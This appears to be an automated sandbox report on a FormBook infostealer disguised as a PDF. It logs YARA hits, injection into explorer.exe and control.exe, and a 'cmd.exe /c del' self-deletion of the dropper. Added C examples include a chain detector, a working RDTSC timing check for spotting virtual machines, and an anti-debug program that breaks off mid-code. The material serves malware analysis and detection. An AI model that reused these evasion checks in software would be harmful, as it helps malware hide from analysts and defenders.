          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@17/8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041E5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsp8287.tmp
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | Virustotal: Detection: 35%
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exe | ReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File read: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
          Source: unknown | Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
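The process tree just recorded is the FormBook hallmark: code injected into explorer.exe starts a system binary from SysWOW64 with no arguments (control.exe in this run), injects into that, and from there runs cmd.exe /c del against the original dropper so the file on the Desktop disappears. The block below is an added detection example written for this page, not code from the report or from the sample; it reconstructs the four "Process created" events above as constructed input and flags the two-step chain. The struct, flag and function names are assumptions.

```c
/* Added example (not code from the report or the sample): flag the
 * explorer.exe -> <SysWOW64 binary, no args> -> cmd.exe /c del <dropper>
 * chain from process-creation events. Field and flag names are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strcasecmp / strncasecmp (POSIX) */

typedef struct {
    const char *parent;   /* image path of the creating process */
    const char *image;    /* image path of the new process */
    const char *cmdline;  /* command line of the new process */
} proc_event;

enum {
    F_SYSTEM_BIN_FROM_EXPLORER = 1, /* explorer.exe -> SysWOW64 binary, no arguments */
    F_SELF_DELETE_CMD          = 2  /* that binary -> cmd.exe /c del <path> */
};

static const char *base_name(const char *path) {
    const char *s = strrchr(path, '\\');
    return s ? s + 1 : path;
}

/* Case-insensitive substring search (strcasestr is not portable C). */
static const char *ci_find(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++)
        if (strncasecmp(hay, needle, n) == 0) return hay;
    return NULL;
}

/* True when the command line is only the image path, optionally quoted. */
static int no_arguments(const char *image, const char *cmdline) {
    size_t len = strlen(cmdline);
    if (len >= 2 && cmdline[0] == '\'' && cmdline[len - 1] == '\'')
        return strlen(image) == len - 2 && strncasecmp(image, cmdline + 1, len - 2) == 0;
    return strcasecmp(image, cmdline) == 0;
}

/* Copies the (quoted) path after "/c del " into out; returns 1 on success. */
static int extract_deleted_path(const char *cmdline, char *out, size_t cap) {
    const char *p = ci_find(cmdline, "/c del ");
    if (!p) return 0;
    p += strlen("/c del ");
    if (*p == '\'') p++;
    size_t n = strcspn(p, "'");
    if (n == 0 || n + 1 > cap) return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Scans the events in order and returns a bitmask of the flags above. When
 * the self-delete step is seen, the deleted path is written to deleted_path. */
int detect_formbook_chain(const proc_event *ev, int n, char *deleted_path, size_t cap) {
    int flags = 0;
    const char *injected_host = NULL;
    for (int i = 0; i < n; i++) {
        if (strcasecmp(base_name(ev[i].parent), "explorer.exe") == 0 &&
            ci_find(ev[i].image, "\\SysWOW64\\") != NULL &&
            no_arguments(ev[i].image, ev[i].cmdline)) {
            flags |= F_SYSTEM_BIN_FROM_EXPLORER;
            injected_host = ev[i].image;
        }
        if (injected_host && strcasecmp(ev[i].parent, injected_host) == 0 &&
            strcasecmp(base_name(ev[i].image), "cmd.exe") == 0 &&
            extract_deleted_path(ev[i].cmdline, deleted_path, cap))
            flags |= F_SELF_DELETE_CMD;
    }
    return flags;
}

/* Constructed input: the report's "Process created" lines for this chain. */
static const proc_event sample_events[] = {
    { "unknown",
      "C:\\Users\\user\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe",
      "'C:\\Users\\user\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe'" },
    { "C:\\Windows\\explorer.exe",
      "C:\\Windows\\SysWOW64\\control.exe",
      "C:\\Windows\\SysWOW64\\control.exe" },
    { "C:\\Windows\\SysWOW64\\control.exe",
      "C:\\Windows\\SysWOW64\\cmd.exe",
      "/c del 'C:\\Users\\user\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe'" },
    { "C:\\Windows\\SysWOW64\\cmd.exe",
      "C:\\Windows\\System32\\conhost.exe",
      "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" },
};
const int sample_event_count = (int)(sizeof sample_events / sizeof sample_events[0]);

int scan_sample_events(char *deleted_path, size_t cap) {
    return detect_formbook_chain(sample_events, sample_event_count, deleted_path, cap);
}

int main(void) {
    char path[512];
    int flags = scan_sample_events(path, sizeof path);
    printf("flags=%d\n", flags);
    if (flags & F_SELF_DELETE_CMD) printf("dropper removed by cmd.exe: %s\n", path);
    return 0;
}
```

The second step is only credited when its parent is the exact binary that explorer.exe spawned, which keeps an ordinary user launching cmd.exe from explorer.exe out of the match; the deleted path is returned so a responder can check whether the original dropper still exists on disk or must be recovered from the sandbox.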
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
          Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041D067 push ss; ret 2_2_0041D06D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004152DB push esi; rep ret 2_2_004152EA
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0040AB63 push esi; iretd 2_2_0040AB67
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B3FB push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041B45C push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00414DEF push ss; iretd 2_2_00414DF0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041C597 push esi; ret 2_2_0041C599
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_0041CE86 push esi; iretd 2_2_0041CE89
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00414F7F push FFFFFF97h; iretd 2_2_00414FBC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00A1D0D1 push ecx; ret 2_2_00A1D0E4
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047ED0D1 push ecx; ret 7_2_047ED0E4
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071D067 push ss; ret 7_2_0071D06D
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_007152DB push esi; rep ret 7_2_007152EA
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0070AB63 push esi; iretd 7_2_0070AB67
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071B3F2 push eax; ret 7_2_0071B3F8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071B3FB push eax; ret 7_2_0071B462
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071B3A5 push eax; ret 7_2_0071B3F8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071B45C push eax; ret 7_2_0071B462
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00714DEF push ss; iretd 7_2_00714DF0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071C597 push esi; ret 7_2_0071C599
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0071CE86 push esi; iretd 7_2_0071CE89
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_00714F7F push FFFFFF97h; iretd 7_2_00714FBC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000007085E4 second address: 00000000007085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 000000000070896E second address: 0000000000708974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004088A0 rdtsc 2_2_004088A0
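The sequence the interceptor caught above (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc) measures how many cycles pass between two back-to-back timestamp reads: on bare metal that is tens of cycles, while a hypervisor that traps RDTSC, or a sandbox that hooks or single-steps the instruction, inflates the gap by orders of magnitude. The program below is an added example written for this page, not code from the sample or from the sandbox; it reproduces the measurement as a self-contained C program and takes the median of many samples so that one interrupt or context switch does not trip it. The threshold (1000 cycles) and the function names are assumptions, and on non-x86 hosts a monotonic nanosecond clock stands in for RDTSC so the file still builds.

```c
/* Added example (not the sample's code): the paired-RDTSC timing check the
 * sandbox intercepted, as a self-contained program. Thresholds are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline uint64_t read_tsc(void) { return __rdtsc(); }
#else
/* Fallback so the example builds on non-x86 hosts: monotonic clock in ns. */
#include <time.h>
static inline uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* Gap between two consecutive reads, same shape as the intercepted
 * sequence: rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc */
uint64_t rdtsc_delta(void) {
    uint64_t t0 = read_tsc();
    volatile uint32_t scratch = 0;   /* stands in for "xor ecx,ecx ; add ecx,eax" */
    scratch += (uint32_t)t0;
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of `samples` deltas: robust against a single interrupt or
 * context switch inflating one measurement. */
uint64_t rdtsc_median_delta(int samples) {
    if (samples < 1) samples = 1;
    uint64_t *d = malloc(sizeof(*d) * (size_t)samples);
    for (int i = 0; i < samples; i++) d[i] = rdtsc_delta();
    qsort(d, (size_t)samples, sizeof(*d), cmp_u64);
    uint64_t med = d[samples / 2];
    free(d);
    return med;
}

/* Returns 1 when the median gap is at or above `threshold`, i.e. the check
 * the malware runs would conclude it is under analysis. */
int rdtsc_timing_check(uint64_t threshold, int samples) {
    return rdtsc_median_delta(samples) >= threshold;
}

int main(void) {
    uint64_t med = rdtsc_median_delta(101);
    printf("median delta between paired reads: %llu\n", (unsigned long long)med);
    printf("analysis environment suspected: %s\n",
           rdtsc_timing_check(1000, 101) ? "yes" : "no");
    return 0;
}
```

The report's "RDTSC instruction interceptor" entries are the sandbox logging exactly such pairs at the two addresses it names; an analyst stepping the sample by hand has to patch the comparison or the measured delta, otherwise the check fails under the debugger just as it would under a hypervisor.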
          Source: C:\Windows\explorer.exe TID: 6872 | Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 6776 | Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmp | Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.919593187.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.665596378.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.673241893.000000000A9CA000.00000004.00000001.sdmp | Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&|
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.671622692.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirXXH
          Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_004088A0 rdtsc 2_2_004088A0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 2_2_00409B10 LdrLoadDll,2_2_00409B10
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_72AD1000
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
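The DebugPort queries, the IsDebuggerPresent call in the dropped DLL (function 0_2_72AD1000) and the fs:[00000030h] reads listed next are three views of the same question. IsDebuggerPresent returns the PEB.BeingDebugged byte, reading fs:[30h] (the PEB pointer in the 32-bit TEB) lets the code fetch that byte without an import that a hook could catch, and ProcessDebugPort asks the kernel directly, so a debugger that only clears the PEB flag is still caught. The program below is an added example, not the sample's code, that performs all three on Windows; on other hosts it falls back to the TracerPid field of /proc/self/status, the nearest POSIX equivalent, so the file builds and runs anywhere. Function names are assumptions.

```c
/* Added example (not the sample's code): the anti-debugging probes the report
 * records, as one self-contained check. Function names are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parses "TracerPid:\t<pid>" out of /proc/<pid>/status text; 0 = no tracer.
 * Kept as a pure function so it can be exercised on constructed input. */
long parse_tracer_pid(const char *status_text) {
    const char *p = strstr(status_text, "TracerPid:");
    if (!p) return 0;
    return strtol(p + strlen("TracerPid:"), NULL, 10);
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>
#include <intrin.h>

typedef NTSTATUS (NTAPI *NtQueryInformationProcess_t)(HANDLE, PROCESSINFOCLASS,
                                                       PVOID, ULONG, PULONG);

/* Direct PEB read, the pattern behind "mov eax, dword ptr fs:[00000030h]"
 * (gs:[60h] holds the PEB pointer on 64-bit Windows). */
int peb_being_debugged(void) {
#ifdef _WIN64
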